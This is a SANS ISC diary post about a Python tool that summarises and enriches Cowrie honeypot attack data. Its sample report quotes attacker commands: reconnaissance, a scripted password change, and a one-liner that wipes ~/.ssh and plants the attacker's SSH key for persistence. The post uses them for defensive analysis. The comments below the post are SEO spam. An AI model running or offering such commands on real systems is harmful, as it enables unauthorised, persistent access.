Honeypot Attack Summaries with Python

Published: 2022-08-18
Last Updated: 2022-08-18 17:53:28 UTC
by Johannes Ullrich (Version: 1)
0 comment(s)

This diary was contributed by Jesse La Grew

Looking through Cowrie [1] data on a DShield honeypot [2] can be a bit of a challenge sometimes. Great tools like jq [3] can make this much easier but adding some context can be useful. We are lucky to have a variety of tools available to enrich existing honeypot data, but also automate that enrichment. I put together a script to try and help myself achieve a simple goal. That goal was to have the capability to review attacks seen on my honeypot from a tablet without needing to type any complicated commands. 

The script I put together is available on GitHub [4]. The script will quickly summarize data and use a variety of sources to enrich the information, including VirusTotal, URLHaus and the DShield API. 
 

                       Session  3e4b2ebfca1e                                      
                      Protocol  ssh                                               
                      Username  admin                                             
                      Password  159753`!@#$                                       
                     Timestamp  2022-05-26T10:25:16.342089Z                       
             Source IP Address  43.154.21.227                                     
               URLhaus IP Tags                                                    
                        ASNAME  TENCENT-NET-AP-CN Tencent Building, Kejizhongyi Avenue
                     ASCOUNTRY  CN                                                
            Total Commands Run  16    

------------------- DOWNLOAD DATA -------------------

                  Download URL                                                    
         Download SHA-256 Hash  a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2
              Destination File  /home/admin/.ssh/authorized_keys                  
                VT Description  Text                                              
      VT Threat Classification  trojan.shell/malkey                               
            VT First Submssion  2018-07-05 12:21:41
             VT Malicious Hits  18    

////////////////// COMMANDS ATTEMPTED //////////////////

# cat /proc/cpuinfo | grep name | wc -l
# echo -e "159753`!@#$\nJXGUdliDnWEk\nJXGUdliDnWEk"|passwd|bash
# echo "159753`!@#$\nJXGUdliDnWEk\nJXGUdliDnWEk\n"|passwd
# cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
# free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
# ls -lh $(which ls)
# which ls
# crontab -l
# w
# uname -m
# cat /proc/cpuinfo | grep model | grep name | wc -l
# top
# uname
# uname -a
# lscpu | grep Model
# cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

 

The data received from the tool gives a summary of the overall attack, information on data uploaded or downloaded to the honeypot and any additional commands that were run on the device. In this case, we see a very common attack that does some device reconnaissance to understand what software is running on the device and what kind of device is being connected to. We also see a password change attempt and an authorized_keys file upload to maintain persistence.

Another example shows some additional data enrichment for other malicious files. Tis example also highlights the recent VirusTotal submission, which could indicate new malware.

screen shot of report with sections highlighted.
Figure 1: Breakdown of Cowrieprocessor output.

This helped to solve my summarization problem but left a challenge on how to easily access this data on a tablet. An option that I added to my script was the ability to upload the data to a Dropbox account. This utilizes a feature within Dropbox that allows creating an App for an account so that data can be programmatically modified using the Dropbox API [5].


Figure 2: Dropbox app upload example of Cowrieprocessor summaries

Now, the data is easily accessible and can be reviewed on a regular basis without special tools. Currently, this is set up as a cronjob running multiple times a day on my honeypot.

For future analysis options, this summary data is also stored on a local SQLite database and can be used for looking for trends over longer periods of time. From the previous “malkey” example, we can see that there have been many similar attacks using the same authorized_keys file data.


Figure 3: SQLite data matching malkey file hash

Other data artifacts are also stored in this process that can be used for future analysis. Only small portions of the VirusTotal are used in the summary reports. Local copies of the full VirusTotal API response is stored in the file system within the Cowrieprocessor working directory. A future article will look to dig into some of this additional data.

Comments, feedback, and suggestions are welcome!

[1] https://github.com/cowrie/cowrie
[2] https://github.com/DShield-ISC/dshield
[3] https://stedolan.github.io/jq/
[4] https://github.com/jslagrew/cowrieprocessor
[5] https://www.dropbox.com/developers/reference/getting-started#app%20console

---

Jesse La Grew
Twitter: @stealthcrane

Keywords: honeypot python
0 comment(s)
ISC Stormcast For Thursday, August 18th, 2022 https://isc.sans.edu/podcastdetail.html?id=8136

Comments

What's this all about ..?
password reveal .
<a hreaf="https://technolytical.com/">the social network</a> is described as follows because they respect your privacy and keep your data secure:

<a hreaf="https://technolytical.com/">the social network</a> is described as follows because they respect your privacy and keep your data secure. The social networks are not interested in collecting data about you. They don't care about what you're doing, or what you like. They don't want to know who you talk to, or where you go.

<a hreaf="https://technolytical.com/">the social network</a> is not interested in collecting data about you. They don't care about what you're doing, or what you like. They don't want to know who you talk to, or where you go. The social networks only collect the minimum amount of information required for the service that they provide. Your personal information is kept private, and is never shared with other companies without your permission
https://thehomestore.com.pk/
<a hreaf="https://defineprogramming.com/the-public-bathroom-near-me-find-nearest-public-toilet/"> public bathroom near me</a>
<a hreaf="https://defineprogramming.com/the-public-bathroom-near-me-find-nearest-public-toilet/"> nearest public toilet to me</a>
<a hreaf="https://defineprogramming.com/the-public-bathroom-near-me-find-nearest-public-toilet/"> public bathroom near me</a>
<a hreaf="https://defineprogramming.com/the-public-bathroom-near-me-find-nearest-public-toilet/"> public bathroom near me</a>
<a hreaf="https://defineprogramming.com/the-public-bathroom-near-me-find-nearest-public-toilet/"> nearest public toilet to me</a>
<a hreaf="https://defineprogramming.com/the-public-bathroom-near-me-find-nearest-public-toilet/"> public bathroom near me</a>
https://defineprogramming.com/
https://defineprogramming.com/
Enter comment here... a fake TeamViewer page, and that page led to a different type of malware. This week's infection involved a downloaded JavaScript (.js) file that led to Microsoft Installer packages (.msi files) containing other script that used free or open source programs.
distribute malware. Even if the URL listed on the ad shows a legitimate website, subsequent ad traffic can easily lead to a fake page. Different types of malware are distributed in this manner. I've seen IcedID (Bokbot), Gozi/ISFB, and various information stealers distributed through fake software websites that were provided through Google ad traffic. I submitted malicious files from this example to VirusTotal and found a low rate of detection, with some files not showing as malware at all. Additionally, domains associated with this infection frequently change. That might make it hard to detect.
https://clickercounter.org/
Enter corthrthmment here...

Diary Archives